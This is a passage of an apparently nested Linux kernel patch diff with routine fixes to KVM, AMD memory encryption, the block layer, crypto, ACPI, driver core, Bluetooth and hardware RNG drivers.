+ 
+ 	/*
+@@ -243,6 +245,7 @@ static int sgx_vepc_release(struct inode *inode, struct file *file)
+ 
+ 		if (sgx_vepc_free_page(epc_page))
+ 			list_add_tail(&epc_page->list, &secs_pages);
++		cond_resched();
+ 	}
+ 
+ 	if (!list_empty(&secs_pages))
+diff --git a/arch/x86/kernel/kvm.c b/arch/x86/kernel/kvm.c
+index d4e48b4a438b2..796e2f9e87619 100644
+--- a/arch/x86/kernel/kvm.c
++++ b/arch/x86/kernel/kvm.c
+@@ -972,10 +972,8 @@ static void __init kvm_init_platform(void)
+ 		 * Ensure that _bss_decrypted section is marked as decrypted in the
+ 		 * shared pages list.
+ 		 */
+-		nr_pages = DIV_ROUND_UP(__end_bss_decrypted - __start_bss_decrypted,
+-					PAGE_SIZE);
+ 		early_set_mem_enc_dec_hypercall((unsigned long)__start_bss_decrypted,
+-						nr_pages, 0);
++						__end_bss_decrypted - __start_bss_decrypted, 0);
+ 
+ 		/*
+ 		 * If not booted using EFI, enable Live migration support.
+diff --git a/arch/x86/kvm/mmu/mmu.c b/arch/x86/kvm/mmu/mmu.c
+index beca03556379d..7a6df4b62c1bd 100644
+--- a/arch/x86/kvm/mmu/mmu.c
++++ b/arch/x86/kvm/mmu/mmu.c
+@@ -42,6 +42,7 @@
+ #include <linux/uaccess.h>
+ #include <linux/hash.h>
+ #include <linux/kern_levels.h>
++#include <linux/kstrtox.h>
+ #include <linux/kthread.h>
+ 
+ #include <asm/page.h>
+@@ -55,6 +56,8 @@
+ 
+ extern bool itlb_multihit_kvm_mitigation;
+ 
++static bool nx_hugepage_mitigation_hard_disabled;
++
+ int __read_mostly nx_huge_pages = -1;
+ static uint __read_mostly nx_huge_pages_recovery_period_ms;
+ #ifdef CONFIG_PREEMPT_RT
+@@ -64,12 +67,13 @@ static uint __read_mostly nx_huge_pages_recovery_ratio = 0;
+ static uint __read_mostly nx_huge_pages_recovery_ratio = 60;
+ #endif
+ 
++static int get_nx_huge_pages(char *buffer, const struct kernel_param *kp);
+ static int set_nx_huge_pages(const char *val, const struct kernel_param *kp);
+ static int set_nx_huge_pages_recovery_param(const char *val, const struct kernel_param *kp);
+ 
+ static const struct kernel_param_ops nx_huge_pages_ops = {
+ 	.set = set_nx_huge_pages,
+-	.get = param_get_bool,
++	.get = get_nx_huge_pages,
+ };
+ 
+ static const struct kernel_param_ops nx_huge_pages_recovery_param_ops = {
+@@ -6644,6 +6648,14 @@ static void mmu_destroy_caches(void)
+ 	kmem_cache_destroy(mmu_page_header_cache);
+ }
+ 
++static int get_nx_huge_pages(char *buffer, const struct kernel_param *kp)
++{
++	if (nx_hugepage_mitigation_hard_disabled)
++		return sprintf(buffer, "never\n");
++
++	return param_get_bool(buffer, kp);
++}
++
+ static bool get_nx_auto_mode(void)
+ {
+ 	/* Return true when CPU has the bug, and mitigations are ON */
+@@ -6660,15 +6672,29 @@ static int set_nx_huge_pages(const char *val, const struct kernel_param *kp)
+ 	bool old_val = nx_huge_pages;
+ 	bool new_val;
+ 
++	if (nx_hugepage_mitigation_hard_disabled)
++		return -EPERM;
++
+ 	/* In "auto" mode deploy workaround only if CPU has the bug. */
+-	if (sysfs_streq(val, "off"))
++	if (sysfs_streq(val, "off")) {
+ 		new_val = 0;
+-	else if (sysfs_streq(val, "force"))
++	} else if (sysfs_streq(val, "force")) {
+ 		new_val = 1;
+-	else if (sysfs_streq(val, "auto"))
++	} else if (sysfs_streq(val, "auto")) {
+ 		new_val = get_nx_auto_mode();
+-	else if (strtobool(val, &new_val) < 0)
++	} else if (sysfs_streq(val, "never")) {
++		new_val = 0;
++
++		mutex_lock(&kvm_lock);
++		if (!list_empty(&vm_list)) {
++			mutex_unlock(&kvm_lock);
++			return -EBUSY;
++		}
++		nx_hugepage_mitigation_hard_disabled = true;
++		mutex_unlock(&kvm_lock);
++	} else if (kstrtobool(val, &new_val) < 0) {
+ 		return -EINVAL;
++	}
+ 
+ 	__set_nx_huge_pages(new_val);
+ 
+@@ -6799,6 +6825,9 @@ static int set_nx_huge_pages_recovery_param(const char *val, const struct kernel
+ 	uint old_period, new_period;
+ 	int err;
+ 
++	if (nx_hugepage_mitigation_hard_disabled)
++		return -EPERM;
++
+ 	was_recovery_enabled = calc_nx_huge_pages_recovery_period(&old_period);
+ 
+ 	err = param_set_uint(val, kp);
+@@ -6922,6 +6951,9 @@ int kvm_mmu_post_init_vm(struct kvm *kvm)
+ {
+ 	int err;
+ 
++	if (nx_hugepage_mitigation_hard_disabled)
++		return 0;
++
+ 	err = kvm_vm_create_worker_thread(kvm, kvm_nx_lpage_recovery_worker, 0,
+ 					  "kvm-nx-lpage-recovery",
+ 					  &kvm->arch.nx_lpage_recovery_thread);
+diff --git a/arch/x86/mm/mem_encrypt_amd.c b/arch/x86/mm/mem_encrypt_amd.c
+index ff6c0462beee7..3ea0f763540a4 100644
+--- a/arch/x86/mm/mem_encrypt_amd.c
++++ b/arch/x86/mm/mem_encrypt_amd.c
+@@ -288,11 +288,10 @@ static bool amd_enc_cache_flush_required(void)
+ 	return !cpu_feature_enabled(X86_FEATURE_SME_COHERENT);
+ }
+ 
+-static void enc_dec_hypercall(unsigned long vaddr, int npages, bool enc)
++static void enc_dec_hypercall(unsigned long vaddr, unsigned long size, bool enc)
+ {
+ #ifdef CONFIG_PARAVIRT
+-	unsigned long sz = npages << PAGE_SHIFT;
+-	unsigned long vaddr_end = vaddr + sz;
++	unsigned long vaddr_end = vaddr + size;
+ 
+ 	while (vaddr < vaddr_end) {
+ 		int psize, pmask, level;
+@@ -342,7 +341,7 @@ static bool amd_enc_status_change_finish(unsigned long vaddr, int npages, bool e
+ 		snp_set_memory_private(vaddr, npages);
+ 
+ 	if (!cc_platform_has(CC_ATTR_HOST_MEM_ENCRYPT))
+-		enc_dec_hypercall(vaddr, npages, enc);
++		enc_dec_hypercall(vaddr, npages << PAGE_SHIFT, enc);
+ 
+ 	return true;
+ }
+@@ -466,7 +465,7 @@ static int __init early_set_memory_enc_dec(unsigned long vaddr,
+ 
+ 	ret = 0;
+ 
+-	early_set_mem_enc_dec_hypercall(start, PAGE_ALIGN(size) >> PAGE_SHIFT, enc);
++	early_set_mem_enc_dec_hypercall(start, size, enc);
+ out:
+ 	__flush_tlb_all();
+ 	return ret;
+@@ -482,9 +481,9 @@ int __init early_set_memory_encrypted(unsigned long vaddr, unsigned long size)
+ 	return early_set_memory_enc_dec(vaddr, size, true);
+ }
+ 
+-void __init early_set_mem_enc_dec_hypercall(unsigned long vaddr, int npages, bool enc)
++void __init early_set_mem_enc_dec_hypercall(unsigned long vaddr, unsigned long size, bool enc)
+ {
+-	enc_dec_hypercall(vaddr, npages, enc);
++	enc_dec_hypercall(vaddr, size, enc);
+ }
+ 
+ void __init sme_early_init(void)
+diff --git a/arch/xtensa/include/asm/core.h b/arch/xtensa/include/asm/core.h
+index f856d2bcb9f36..7cef85ad9741a 100644
+--- a/arch/xtensa/include/asm/core.h
++++ b/arch/xtensa/include/asm/core.h
+@@ -44,4 +44,13 @@
+ #define XTENSA_STACK_ALIGNMENT	16
+ #endif
+ 
++#ifndef XCHAL_HW_MIN_VERSION
++#if defined(XCHAL_HW_MIN_VERSION_MAJOR) && defined(XCHAL_HW_MIN_VERSION_MINOR)
++#define XCHAL_HW_MIN_VERSION (XCHAL_HW_MIN_VERSION_MAJOR * 100 + \
++			      XCHAL_HW_MIN_VERSION_MINOR)
++#else
++#define XCHAL_HW_MIN_VERSION 0
++#endif
++#endif
++
+ #endif
+diff --git a/arch/xtensa/kernel/perf_event.c b/arch/xtensa/kernel/perf_event.c
+index a0d05c8598d0f..183618090d05b 100644
+--- a/arch/xtensa/kernel/perf_event.c
++++ b/arch/xtensa/kernel/perf_event.c
+@@ -13,17 +13,26 @@
+ #include <linux/perf_event.h>
+ #include <linux/platform_device.h>
+ 
++#include <asm/core.h>
+ #include <asm/processor.h>
+ #include <asm/stacktrace.h>
+ 
++#define XTENSA_HWVERSION_RG_2015_0	260000
++
++#if XCHAL_HW_MIN_VERSION >= XTENSA_HWVERSION_RG_2015_0
++#define XTENSA_PMU_ERI_BASE		0x00101000
++#else
++#define XTENSA_PMU_ERI_BASE		0x00001000
++#endif
++
+ /* Global control/status for all perf counters */
+-#define XTENSA_PMU_PMG			0x1000
++#define XTENSA_PMU_PMG			XTENSA_PMU_ERI_BASE
+ /* Perf counter values */
+-#define XTENSA_PMU_PM(i)		(0x1080 + (i) * 4)
++#define XTENSA_PMU_PM(i)		(XTENSA_PMU_ERI_BASE + 0x80 + (i) * 4)
+ /* Perf counter control registers */
+-#define XTENSA_PMU_PMCTRL(i)		(0x1100 + (i) * 4)
++#define XTENSA_PMU_PMCTRL(i)		(XTENSA_PMU_ERI_BASE + 0x100 + (i) * 4)
+ /* Perf counter status registers */
+-#define XTENSA_PMU_PMSTAT(i)		(0x1180 + (i) * 4)
++#define XTENSA_PMU_PMSTAT(i)		(XTENSA_PMU_ERI_BASE + 0x180 + (i) * 4)
+ 
+ #define XTENSA_PMU_PMG_PMEN		0x1
+ 
+diff --git a/block/blk-settings.c b/block/blk-settings.c
+index 291cf9df7fc29..86ff375c00ce4 100644
+--- a/block/blk-settings.c
++++ b/block/blk-settings.c
+@@ -824,10 +824,13 @@ EXPORT_SYMBOL(blk_set_queue_depth);
+  */
+ void blk_queue_write_cache(struct request_queue *q, bool wc, bool fua)
+ {
+-	if (wc)
++	if (wc) {
++		blk_queue_flag_set(QUEUE_FLAG_HW_WC, q);
+ 		blk_queue_flag_set(QUEUE_FLAG_WC, q);
+-	else
++	} else {
++		blk_queue_flag_clear(QUEUE_FLAG_HW_WC, q);
+ 		blk_queue_flag_clear(QUEUE_FLAG_WC, q);
++	}
+ 	if (fua)
+ 		blk_queue_flag_set(QUEUE_FLAG_FUA, q);
+ 	else
+diff --git a/block/blk-sysfs.c b/block/blk-sysfs.c
+index e71b3b43927c0..a582ea0da74f5 100644
+--- a/block/blk-sysfs.c
++++ b/block/blk-sysfs.c
+@@ -528,21 +528,16 @@ static ssize_t queue_wc_show(struct request_queue *q, char *page)
+ static ssize_t queue_wc_store(struct request_queue *q, const char *page,
+ 			      size_t count)
+ {
+-	int set = -1;
+-
+-	if (!strncmp(page, "write back", 10))
+-		set = 1;
+-	else if (!strncmp(page, "write through", 13) ||
+-		 !strncmp(page, "none", 4))
+-		set = 0;
+-
+-	if (set == -1)
+-		return -EINVAL;
+-
+-	if (set)
++	if (!strncmp(page, "write back", 10)) {
++		if (!test_bit(QUEUE_FLAG_HW_WC, &q->queue_flags))
++			return -EINVAL;
+ 		blk_queue_flag_set(QUEUE_FLAG_WC, q);
+-	else
++	} else if (!strncmp(page, "write through", 13) ||
++		 !strncmp(page, "none", 4)) {
+ 		blk_queue_flag_clear(QUEUE_FLAG_WC, q);
++	} else {
++		return -EINVAL;
++	}
+ 
+ 	return count;
+ }
+diff --git a/block/ioctl.c b/block/ioctl.c
+index 9c5f637ff153f..3c475e4166e9f 100644
+--- a/block/ioctl.c
++++ b/block/ioctl.c
+@@ -20,6 +20,8 @@ static int blkpg_do_ioctl(struct block_device *bdev,
+ 	struct blkpg_partition p;
+ 	long long start, length;
+ 
++	if (disk->flags & GENHD_FL_NO_PART)
++		return -EINVAL;
+ 	if (!capable(CAP_SYS_ADMIN))
+ 		return -EACCES;
+ 	if (copy_from_user(&p, upart, sizeof(struct blkpg_partition)))
+diff --git a/block/mq-deadline.c b/block/mq-deadline.c
+index f10c2a0d18d41..55e26065c2e27 100644
+--- a/block/mq-deadline.c
++++ b/block/mq-deadline.c
+@@ -622,8 +622,9 @@ static void dd_depth_updated(struct blk_mq_hw_ctx *hctx)
+ 	struct request_queue *q = hctx->queue;
+ 	struct deadline_data *dd = q->elevator->elevator_data;
+ 	struct blk_mq_tags *tags = hctx->sched_tags;
++	unsigned int shift = tags->bitmap_tags.sb.shift;
+ 
+-	dd->async_depth = max(1UL, 3 * q->nr_requests / 4);
++	dd->async_depth = max(1U, 3 * (1U << shift)  / 4);
+ 
+ 	sbitmap_queue_min_shallow_depth(&tags->bitmap_tags, dd->async_depth);
+ }
+diff --git a/crypto/algapi.c b/crypto/algapi.c
+index 8c3a869cc43a9..5dc9ccdd5a510 100644
+--- a/crypto/algapi.c
++++ b/crypto/algapi.c
+@@ -17,6 +17,7 @@
+ #include <linux/rtnetlink.h>
+ #include <linux/slab.h>
+ #include <linux/string.h>
++#include <linux/workqueue.h>
+ 
+ #include "internal.h"
+ 
+@@ -74,15 +75,26 @@ static void crypto_free_instance(struct crypto_instance *inst)
+ 	inst->alg.cra_type->free(inst);
+ }
+ 
+-static void crypto_destroy_instance(struct crypto_alg *alg)
++static void crypto_destroy_instance_workfn(struct work_struct *w)
+ {
+-	struct crypto_instance *inst = (void *)alg;
++	struct crypto_instance *inst = container_of(w, struct crypto_instance,
++						    free_work);
+ 	struct crypto_template *tmpl = inst->tmpl;
+ 
+ 	crypto_free_instance(inst);
+ 	crypto_tmpl_put(tmpl);
+ }
+ 
++static void crypto_destroy_instance(struct crypto_alg *alg)
++{
++	struct crypto_instance *inst = container_of(alg,
++						    struct crypto_instance,
++						    alg);
++
++	INIT_WORK(&inst->free_work, crypto_destroy_instance_workfn);
++	schedule_work(&inst->free_work);
++}
++
+ /*
+  * This function adds a spawn to the list secondary_spawns which
+  * will be used at the end of crypto_remove_spawns to unregister
+diff --git a/crypto/asymmetric_keys/x509_public_key.c b/crypto/asymmetric_keys/x509_public_key.c
+index 0b4943a4592b7..1815024bead38 100644
+--- a/crypto/asymmetric_keys/x509_public_key.c
++++ b/crypto/asymmetric_keys/x509_public_key.c
+@@ -117,6 +117,11 @@ int x509_check_for_self_signed(struct x509_certificate *cert)
+ 			goto out;
+ 	}
+ 
++	if (cert->unsupported_sig) {
++		ret = 0;
++		goto out;
++	}
++
+ 	ret = public_key_verify_signature(cert->pub, cert->sig);
+ 	if (ret < 0) {
+ 		if (ret == -ENOPKG) {
+diff --git a/crypto/rsa-pkcs1pad.c b/crypto/rsa-pkcs1pad.c
+index 3237b50baf3c5..1cf267bc6f9ea 100644
+--- a/crypto/rsa-pkcs1pad.c
++++ b/crypto/rsa-pkcs1pad.c
+@@ -575,6 +575,10 @@ static int pkcs1pad_init_tfm(struct crypto_akcipher *tfm)
+ 		return PTR_ERR(child_tfm);
+ 
+ 	ctx->child = child_tfm;
++
++	akcipher_set_reqsize(tfm, sizeof(struct pkcs1pad_request) +
++				  crypto_akcipher_reqsize(child_tfm));
++
+ 	return 0;
+ }
+ 
+@@ -670,7 +674,6 @@ static int pkcs1pad_create(struct crypto_template *tmpl, struct rtattr **tb)
+ 	inst->alg.set_pub_key = pkcs1pad_set_pub_key;
+ 	inst->alg.set_priv_key = pkcs1pad_set_priv_key;
+ 	inst->alg.max_size = pkcs1pad_get_max_size;
+-	inst->alg.reqsize = sizeof(struct pkcs1pad_request) + rsa_alg->reqsize;
+ 
+ 	inst->free = pkcs1pad_free;
+ 
+diff --git a/drivers/acpi/x86/s2idle.c b/drivers/acpi/x86/s2idle.c
+index e499c60c45791..ec84da6cc1bff 100644
+--- a/drivers/acpi/x86/s2idle.c
++++ b/drivers/acpi/x86/s2idle.c
+@@ -122,17 +122,16 @@ static void lpi_device_get_constraints_amd(void)
+ 			acpi_handle_debug(lps0_device_handle,
+ 					  "LPI: constraints list begin:\n");
+ 
+-			for (j = 0; j < package->package.count; ++j) {
++			for (j = 0; j < package->package.count; j++) {
+ 				union acpi_object *info_obj = &package->package.elements[j];
+ 				struct lpi_device_constraint_amd dev_info = {};
+ 				struct lpi_constraints *list;
+ 				acpi_status status;
+ 
+-				for (k = 0; k < info_obj->package.count; ++k) {
+-					union acpi_object *obj = &info_obj->package.elements[k];
++				list = &lpi_constraints_table[lpi_constraints_table_size];
+ 
+-					list = &lpi_constraints_table[lpi_constraints_table_size];
+-					list->min_dstate = -1;
++				for (k = 0; k < info_obj->package.count; k++) {
++					union acpi_object *obj = &info_obj->package.elements[k];
+ 
+ 					switch (k) {
+ 					case 0:
+@@ -148,27 +147,21 @@ static void lpi_device_get_constraints_amd(void)
+ 						dev_info.min_dstate = obj->integer.value;
+ 						break;
+ 					}
++				}
+ 
+-					if (!dev_info.enabled || !dev_info.name ||
+-					    !dev_info.min_dstate)
+-						continue;
++				if (!dev_info.enabled || !dev_info.name ||
++				    !dev_info.min_dstate)
++					continue;
+ 
+-					status = acpi_get_handle(NULL, dev_info.name,
+-								 &list->handle);
+-					if (ACPI_FAILURE(status))
+-						continue;
++				status = acpi_get_handle(NULL, dev_info.name, &list->handle);
++				if (ACPI_FAILURE(status))
++					continue;
+ 
+-					acpi_handle_debug(lps0_device_handle,
+-							  "Name:%s\n", dev_info.name);
++				acpi_handle_debug(lps0_device_handle,
++						  "Name:%s\n", dev_info.name);
+ 
+-					list->min_dstate = dev_info.min_dstate;
++				list->min_dstate = dev_info.min_dstate;
+ 
+-					if (list->min_dstate < 0) {
+-						acpi_handle_debug(lps0_device_handle,
+-								  "Incomplete constraint defined\n");
+-						continue;
+-					}
+-				}
+ 				lpi_constraints_table_size++;
+ 			}
+ 		}
+@@ -213,7 +206,7 @@ static void lpi_device_get_constraints(void)
+ 		if (!package)
+ 			continue;
+ 
+-		for (j = 0; j < package->package.count; ++j) {
++		for (j = 0; j < package->package.count; j++) {
+ 			union acpi_object *element =
+ 					&(package->package.elements[j]);
+ 
+@@ -245,7 +238,7 @@ static void lpi_device_get_constraints(void)
+ 
+ 		constraint->min_dstate = -1;
+ 
+-		for (j = 0; j < package_count; ++j) {
++		for (j = 0; j < package_count; j++) {
+ 			union acpi_object *info_obj = &info.package[j];
+ 			union acpi_object *cnstr_pkg;
+ 			union acpi_object *obj;
+diff --git a/drivers/amba/bus.c b/drivers/amba/bus.c
+index 110a535648d2e..0aa2d3111ae6e 100644
+--- a/drivers/amba/bus.c
++++ b/drivers/amba/bus.c
+@@ -534,6 +534,7 @@ static void amba_device_release(struct device *dev)
+ {
+ 	struct amba_device *d = to_amba_device(dev);
+ 
++	of_node_put(d->dev.of_node);
+ 	if (d->res.parent)
+ 		release_resource(&d->res);
+ 	mutex_destroy(&d->periphid_lock);
+diff --git a/drivers/ata/pata_arasan_cf.c b/drivers/ata/pata_arasan_cf.c
+index e89617ed9175b..46588fc829432 100644
+--- a/drivers/ata/pata_arasan_cf.c
++++ b/drivers/ata/pata_arasan_cf.c
+@@ -529,7 +529,8 @@ static void data_xfer(struct work_struct *work)
+ 	/* dma_request_channel may sleep, so calling from process context */
+ 	acdev->dma_chan = dma_request_chan(acdev->host->dev, "data");
+ 	if (IS_ERR(acdev->dma_chan)) {
+-		dev_err(acdev->host->dev, "Unable to get dma_chan\n");
++		dev_err_probe(acdev->host->dev, PTR_ERR(acdev->dma_chan),
++			      "Unable to get dma_chan\n");
+ 		acdev->dma_chan = NULL;
+ 		goto chan_request_fail;
+ 	}
+diff --git a/drivers/base/core.c b/drivers/base/core.c
+index e30223c2672fc..af90bfb0cc3d8 100644
+--- a/drivers/base/core.c
++++ b/drivers/base/core.c
+@@ -3855,6 +3855,17 @@ void device_del(struct device *dev)
+ 	device_platform_notify_remove(dev);
+ 	device_links_purge(dev);
+ 
++	/*
++	 * If a device does not have a driver attached, we need to clean
++	 * up any managed resources. We do this in device_release(), but
++	 * it's never called (and we leak the device) if a managed
++	 * resource holds a reference to the device. So release all
++	 * managed resources here, like we do in driver_detach(). We
++	 * still need to do so again in device_release() in case someone
++	 * adds a new resource after this point, though.
++	 */
++	devres_release_all(dev);
++
+ 	if (dev->bus)
+ 		blocking_notifier_call_chain(&dev->bus->p->bus_notifier,
+ 					     BUS_NOTIFY_REMOVED_DEVICE, dev);
+diff --git a/drivers/base/dd.c b/drivers/base/dd.c
+index 97ab1468a8760..380a53b6aee81 100644
+--- a/drivers/base/dd.c
++++ b/drivers/base/dd.c
+@@ -674,6 +674,8 @@ re_probe:
+ 
+ 		device_remove(dev);
+ 		driver_sysfs_remove(dev);
++		if (dev->bus && dev->bus->dma_cleanup)
++			dev->bus->dma_cleanup(dev);
+ 		device_unbind_cleanup(dev);
+ 
+ 		goto re_probe;
+diff --git a/drivers/base/regmap/regcache-rbtree.c b/drivers/base/regmap/regcache-rbtree.c
+index fabf87058d80b..ae6b8788d5f3f 100644
+--- a/drivers/base/regmap/regcache-rbtree.c
++++ b/drivers/base/regmap/regcache-rbtree.c
+@@ -277,7 +277,7 @@ static int regcache_rbtree_insert_to_block(struct regmap *map,
+ 
+ 	blk = krealloc(rbnode->block,
+ 		       blklen * map->cache_word_size,
+-		       GFP_KERNEL);
++		       map->alloc_flags);
+ 	if (!blk)
+ 		return -ENOMEM;
+ 
+@@ -286,7 +286,7 @@ static int regcache_rbtree_insert_to_block(struct regmap *map,
+ 	if (BITS_TO_LONGS(blklen) > BITS_TO_LONGS(rbnode->blklen)) {
+ 		present = krealloc(rbnode->cache_present,
+ 				   BITS_TO_LONGS(blklen) * sizeof(*present),
+-				   GFP_KERNEL);
++				   map->alloc_flags);
+ 		if (!present)
+ 			return -ENOMEM;
+ 
+@@ -320,7 +320,7 @@ regcache_rbtree_node_alloc(struct regmap *map, unsigned int reg)
+ 	const struct regmap_range *range;
+ 	int i;
+ 
+-	rbnode = kzalloc(sizeof(*rbnode), GFP_KERNEL);
++	rbnode = kzalloc(sizeof(*rbnode), map->alloc_flags);
+ 	if (!rbnode)
+ 		return NULL;
+ 
+@@ -346,13 +346,13 @@ regcache_rbtree_node_alloc(struct regmap *map, unsigned int reg)
+ 	}
+ 
+ 	rbnode->block = kmalloc_array(rbnode->blklen, map->cache_word_size,
+-				      GFP_KERNEL);
++				      map->alloc_flags);
+ 	if (!rbnode->block)
+ 		goto err_free;
+ 
+ 	rbnode->cache_present = kcalloc(BITS_TO_LONGS(rbnode->blklen),
+ 					sizeof(*rbnode->cache_present),
+-					GFP_KERNEL);
++					map->alloc_flags);
+ 	if (!rbnode->cache_present)
+ 		goto err_free_block;
+ 
+diff --git a/drivers/base/test/test_async_driver_probe.c b/drivers/base/test/test_async_driver_probe.c
+index 929410d0dd6fe..3465800baa6c8 100644
+--- a/drivers/base/test/test_async_driver_probe.c
++++ b/drivers/base/test/test_async_driver_probe.c
+@@ -84,7 +84,7 @@ test_platform_device_register_node(char *name, int id, int nid)
+ 
+ 	pdev = platform_device_alloc(name, id);
+ 	if (!pdev)
+-		return NULL;
++		return ERR_PTR(-ENOMEM);
+ 
+ 	if (nid != NUMA_NO_NODE)
+ 		set_dev_node(&pdev->dev, nid);
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index d6f405763c56f..f2062c2a28da8 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -1984,7 +1984,7 @@ static int btusb_switch_alt_setting(struct hci_dev *hdev, int new_alts)
+ 		 * alternate setting.
+ 		 */
+ 		spin_lock_irqsave(&data->rxlock, flags);
+-		kfree_skb(data->sco_skb);
++		dev_kfree_skb_irq(data->sco_skb);
+ 		data->sco_skb = NULL;
+ 		spin_unlock_irqrestore(&data->rxlock, flags);
+ 
+diff --git a/drivers/bluetooth/hci_nokia.c b/drivers/bluetooth/hci_nokia.c
+index 05f7f6de6863d..97da0b2bfd17e 100644
+--- a/drivers/bluetooth/hci_nokia.c
++++ b/drivers/bluetooth/hci_nokia.c
+@@ -734,7 +734,11 @@ static int nokia_bluetooth_serdev_probe(struct serdev_device *serdev)
+ 		return err;
+ 	}
+ 
+-	clk_prepare_enable(sysclk);
++	err = clk_prepare_enable(sysclk);
++	if (err) {
++		dev_err(dev, "could not enable sysclk: %d", err);
++		return err;
++	}
+ 	btdev->sysclk_speed = clk_get_rate(sysclk);
+ 	clk_disable_unprepare(sysclk);
+ 
+diff --git a/drivers/bus/imx-weim.c b/drivers/bus/imx-weim.c
+index 55d917bd1f3f8..64f9eacd1b38d 100644
+--- a/drivers/bus/imx-weim.c
++++ b/drivers/bus/imx-weim.c
+@@ -331,6 +331,12 @@ static int of_weim_notify(struct notifier_block *nb, unsigned long action,
+ 				 "Failed to setup timing for '%pOF'\n", rd->dn);
+ 
+ 		if (!of_node_check_flag(rd->dn, OF_POPULATED)) {
++			/*
++			 * Clear the flag before adding the device so that
++			 * fw_devlink doesn't skip adding consumers to this
++			 * device.
++			 */
++			rd->dn->fwnode.flags &= ~FWNODE_FLAG_NOT_DEVICE;
+ 			if (!of_platform_device_create(rd->dn, NULL, &pdev->dev)) {
+ 				dev_err(&pdev->dev,
+ 					"Failed to create child device '%pOF'\n",
+diff --git a/drivers/bus/ti-sysc.c b/drivers/bus/ti-sysc.c
+index 9b7268bae66ab..ac36b01cf6d5d 100644
+--- a/drivers/bus/ti-sysc.c
++++ b/drivers/bus/ti-sysc.c
+@@ -3125,7 +3125,7 @@ static int sysc_init_static_data(struct sysc *ddata)
+ 
+ 	match = soc_device_match(sysc_soc_match);
+ 	if (match && match->data)
+-		sysc_soc->soc = (int)match->data;
++		sysc_soc->soc = (enum sysc_soc)(uintptr_t)match->data;
+ 
+ 	/*
+ 	 * Check and warn about possible old incomplete dtb. We now want to see
+diff --git a/drivers/char/hw_random/iproc-rng200.c b/drivers/char/hw_random/iproc-rng200.c
+index 06bc060534d81..c0df053cbe4b2 100644
+--- a/drivers/char/hw_random/iproc-rng200.c
++++ b/drivers/char/hw_random/iproc-rng200.c
+@@ -182,6 +182,8 @@ static int iproc_rng200_probe(struct platform_device *pdev)
+ 		return PTR_ERR(priv->base);
+ 	}
+ 
++	dev_set_drvdata(dev, priv);
++
+ 	priv->rng.name = "iproc-rng200";
+ 	priv->rng.read = iproc_rng200_read;
+ 	priv->rng.init = iproc_rng200_init;
+@@ -199,6 +201,28 @@ static int iproc_rng200_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
++static int __maybe_unused iproc_rng200_suspend(struct device *dev)
++{
++	struct iproc_rng200_dev *priv = dev_get_drvdata(dev);
++
++	iproc_rng200_cleanup(&priv->rng);
++
++	return 0;
++}
++
++static int __maybe_unused iproc_rng200_resume(struct device *dev)
++{
++	struct iproc_rng200_dev *priv =  dev_get_drvdata(dev);
++
++	iproc_rng200_init(&priv->rng);
++
++	return 0;
++}
++
++static const struct dev_pm_ops iproc_rng200_pm_ops = {
++	SET_SYSTEM_SLEEP_PM_OPS(iproc_rng200_suspend, iproc_rng200_resume)
++};
++
+ static const struct of_device_id iproc_rng200_of_match[] = {
+ 	{ .compatible = "brcm,bcm2711-rng200", },
+ 	{ .compatible = "brcm,bcm7211-rng200", },
+@@ -212,6 +236,7 @@ static struct platform_driver iproc_rng200_driver = {
+ 	.driver = {
+ 		.name		= "iproc-rng200",
+ 		.of_match_table = iproc_rng200_of_match,
++		.pm		= &iproc_rng200_pm_ops,
+ 	},
+ 	.probe		= iproc_rng200_probe,
+ };
+diff --git a/drivers/char/hw_random/nomadik-rng.c b/drivers/char/hw_random/nomadik-rng.c
+index e8f9621e79541..3774adf903a83 100644
+--- a/drivers/char/hw_random/nomadik-rng.c
++++ b/drivers/char/hw_random/nomadik-rng.c
+@@ -13,8 +13,6 @@
+ #include <linux/clk.h>
+ #include <linux/err.h>
+ 
+-static struct clk *rng_clk;
+-
+ static int nmk_rng_read(struct hwrng *rng, void *data, size_t max, bool wait)
+ {
+ 	void __iomem *base = (void __iomem *)rng->priv;
+@@ -36,21 +34,20 @@ static struct hwrng nmk_rng = {
+ 
+ static int nmk_rng_probe(struct amba_device *dev, const struct amba_id *id)
+ {
++	struct clk *rng_clk;
+ 	void __iomem *base;
+ 	int ret;
+ 
+-	rng_clk = devm_clk_get(&dev->dev, NULL);
++	rng_clk = devm_clk_get_enabled(&dev->dev, NULL);
+ 	if (IS_ERR(rng_clk)) {
+ 		dev_err(&dev->dev, "could not get rng clock\n");
+ 		ret = PTR_ERR(rng_clk);
+ 		return ret;
+ 	}
+ 
+-	clk_prepare_enable(rng_clk);
+-
+ 	ret = amba_request_regions(dev, dev->dev.init_name);
+ 	if (ret)
+-		goto out_clk;
++		return ret;
+ 	ret = -ENOMEM;
+ 	base = devm_ioremap(&dev->dev, dev->res.start,
+ 			    resource_size(&dev->res));
+@@ -64,15 +61,12 @@ static int nmk_rng_probe(struct amba_device *dev, const struct amba_id *id)
+ 
+ out_release:
+ 	amba_release_regions(dev);
+-out_clk:
+-	clk_disable_unprepare(rng_clk);
+ 	return ret;
+ }
+ 
+ static void nmk_rng_remove(struct amba_device *dev)
+ {
+ 	amba_release_regions(dev);
+-	clk_disable_unprepare(rng_clk);
+ }
+ 
+ static const struct amba_id nmk_rng_ids[] = {
+diff --git a/drivers/char/hw_random/pic32-rng.c b/drivers/char/hw_random/pic32-rng.c
+index 99c8bd0859a14..e04a054e89307 100644
+--- a/drivers/char/hw_random/pic32-rng.c
++++ b/drivers/char/hw_random/pic32-rng.c
+@@ -36,7 +36,6 @@
+ struct pic32_rng {
+ 	void __iomem	*base;
+ 	struct hwrng	rng;
+-	struct clk	*clk;
+ };
+ 
+ /*
+@@ -70,6 +69,7 @@ static int pic32_rng_read(struct hwrng *rng, void *buf, size_t max,
+ static int pic32_rng_probe(struct platform_device *pdev)
+ {
+ 	struct pic32_rng *priv;
++	struct clk *clk;
+ 	u32 v;
+ 	int ret;
+ 
+@@ -81,13 +81,9 @@ static int pic32_rng_probe(struct platform_device *pdev)
+ 	if (IS_ERR(priv->base))
+ 		return PTR_ERR(priv->base);
+ 
+-	priv->clk = devm_clk_get(&pdev->dev, NULL);
+-	if (IS_ERR(priv->clk))
+-		return PTR_ERR(priv->clk);
+-
+-	ret = clk_prepare_enable(priv->clk);
+-	if (ret)
+-		return ret;
++	clk = devm_clk_get_enabled(&pdev->dev, NULL);
++	if (IS_ERR(clk))
